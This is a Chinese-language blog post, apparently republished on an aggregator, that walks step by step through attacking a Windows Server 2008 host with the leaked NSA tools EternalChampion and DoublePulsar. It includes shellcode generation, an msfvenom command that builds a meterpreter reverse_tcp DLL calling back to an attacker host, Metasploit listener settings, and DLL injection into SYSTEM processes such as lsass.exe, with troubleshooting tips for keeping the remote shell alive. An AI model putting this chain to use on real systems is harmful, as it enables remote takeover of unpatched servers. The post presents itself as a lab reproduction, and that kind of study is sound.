當前位置:
首頁 > 最新 > NSA武器庫之eternalchampion復現

NSA武器庫之eternalchampion復現

一、準備工作

此次配置環境和上篇差不多

攻擊機1

帶有漏洞利用工具集的XP,並且此次需要準備好WinHex, IP 172.26.97.35

攻擊機2

Kali, IP 172.26.97.226

靶機

Windows Server 2008 SP1 x86, IP 202.X.X.X,已經開啟445埠

開啟FuzzBunch

不知道怎麼運行FuzzBunch的,請參考我的上篇博文,操作方式和上次一樣。TargetIP寫靶機IP 202.X.X.X,CallBack寫運行fb的IP,也就是172.26.97.35,不使用Redirection

二、開始使用smbtouch探測use smbtouch execute

smbtouch會為我們探測出目標系統適用的漏洞利用程序

在這裡我們可以看到,目標系統是32位的,EternalBlue和EternalSynergy不支持攻擊靶機,EternalRomance無法攻擊,只有EternalChampion可以。

使用Doublepulsar生成shellcode

smbtouch成功之後,我們使用Doublepulsar來生成shellcode

use Doublepulsar

我們一路回車默認,會發現多出來一個名為OutputInstall的選項,選擇這個

然後輸入路徑,比如說C:shellcode.bin,一路回車執行就會生成shellcode

將shellcode轉換成HEX

由於EternalChampion需要的是ShellcodeBuffer而不是ShellcodeFile,所以這裡我們需要將Doublepulsar生成的shellcode轉換成十六進位;如果你用的是EternalRomance,那麼應該用的是ShellcodeFile,可以跨過此步

使用WinHex打開我們剛剛生成的shellcode.bin,然後選擇Edit-Copy All-Hex Values,如下圖所示:

使用EternalChampion進行攻擊

現在shellcode已經在我們的剪貼板中了,我們就要使用EternalChampion來進行攻擊了。

use EternalChampion

在之後我們一路回車默認,信息應該都是和目標系統相符的。在Mode :: Delivery mechanism時像上次一樣選擇FB一路回車,在程序提示ShellcodeBuffer :: DOPU Shellcode buffer時右鍵粘貼進那一堆十六進位,由於Shellcode比較長(4KB),所以可能會花幾秒鐘才會粘貼完。

在之後我們一路回車默認,信息應該都是和目標系統相符的。在Mode :: Delivery mechanism時像上次一樣選擇FB。

之後程序會進行詢問,我們回車就能夠運行EternalChampion

啊喲, 贏了,金牌,NSA你們這群人真幽默……

注意:如果你是用的exploit需要Shellcode File,那麼這裡直接輸入shellcode的路徑,本例中為C:shellcode.bin,推薦把shellcode放在根目錄,據GitHub上某人的回復,如果放在某個目錄下可能會導致exploit不認。

使用Doublepulsar注入惡意dll

在這之後,我們使用Doublepulsar注入惡意dll,和上次操作基本一致,這裡我們就再複述下吧

但是在此之前,我想看看後門是否存在,那就Doublepulsar中的選擇function: 1 ping,就可以確定後門是否存在啦

好,咱還是生成惡意dll並用Doublepulsar注入吧!

msfvenom生成惡意dll

切換到Kali,此次就使用reverse_tcp了

#32位操作系統,所以生成32位的dll

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.26.97.226 LPORT=8089 -f dll >badbad.dll

#打開MetaSploit,開始監聽

set PAYLOAD windows/x64/meterpreter/reverse_tcp

use exploit/multi/handler

set LHOST172.26.97.226

set LPORT 8089

run

之後將這個dll拷貝到XP中,使用Python創建個http伺服器

python –m SimpleHTTPServer 80

拿起久違的IE,下載這個badbad.dll文件

注入dlluse DoublePulsar

一路回車默認,只需要選擇function 2 Run DLL,輸入我們的dll文件路徑

然後最後直接運行,就會發現反彈成功,拿到許可權了!

啊喲,執行不了meterpreter命令?

在一些情況下,我們可能會拿到meterpreter的會話,但是可能會發現執行不了啥命令,ping下不通了,猜測目標機器藍屏了,那咋辦呢?

等等直到ping通,然後再次運行EternalChampion攻擊,它會記得我們輸入的shellcode,所以一路回車,然後再次運行Doublepulsar,在程序提示ProcessName [lsass.exe]:選擇其他的以NT AuthoritySystem運行的進程名,比如說spoolsv.exe, SearchIndexer.exe, lsm.exe,這就自己試試了。然後就應該不會藍屏啦~

其實選擇啥進程其實都是可以的,大不了運行meterpreter的時候migrate到其他進程就可以了。

三、後記EternalBlue支持的系統

通過查看xml文件能發現,有點奇怪,EternalBlue的配置文件中支持了這麼多系統,但是有時卻報告不支持。

喜歡這篇文章嗎?立刻分享出去讓更多人知道吧!

本站內容充實豐富,博大精深,小編精選每日熱門資訊,隨時更新,點擊「搶先收到最新資訊」瀏覽吧!


請您繼續閱讀更多來自 推酷 的精彩文章:

擬介科技:為什麼醫生做手術戴上 AR 眼鏡就像有了透視眼一樣?
Rust 妙用:增補標準庫和統一錯誤
那個一站到底中的汪仔機器人,來眾測了?人機大戰誰會獲勝?
如何使用谷歌Chrome瀏覽器竊取Windows密碼
微軟直播應用 Beam 更名 Mixer,新增同屏多遊戲畫面直播功能

TAG:推酷 |

您可能感興趣

Mohammed Arif Ansari加入Market.space團隊
NSA網路武器DoublePulsar升級,Windows Embedded也淪陷了
瑞典執法部門Piketen&Nationella insatsstyrkan
SAP Fiori實施之Transactional Apps實施全過程
Pansar手錶登陸Kickstarter平台推出AR應用Showroom
你的Oracle 12C Transaction Guard已到賬
The Unreliable Sensation 不可靠的覺受
spring的Transactional註解詳細用法
還有這種操作?3D列印巨頭BigRep聯手阿聯酋Immensa Technology Labs打造智能照明牆
用 OpenStack Designate 構建一個 DNS 即服務(DNSaaS)
J Am Acad Orthop Surg:NSAIDs對骨癒合率的影響
系列野餐回顧 Quinsay x Weekend
現貨|Stylmartin義大利 Kansas(堪薩斯)城市系騎行鞋
蘋果 iOS 應用 TeenSafe 泄露數千用戶 Apple ID 信息
VRCHAT殺手?《Sansar》登陸Steam
機智!NSA工具已被移植到 Metasploit 平台
菲律賓美食從巧克力lechon到烤ensaymada冰淇淋
iOS應用TeenSafe或泄露上萬名用戶Apple ID信息
NSA 向 Coreboot 項目貢獻代碼
橄欖球隊 韓國插畫師 Hong soonsang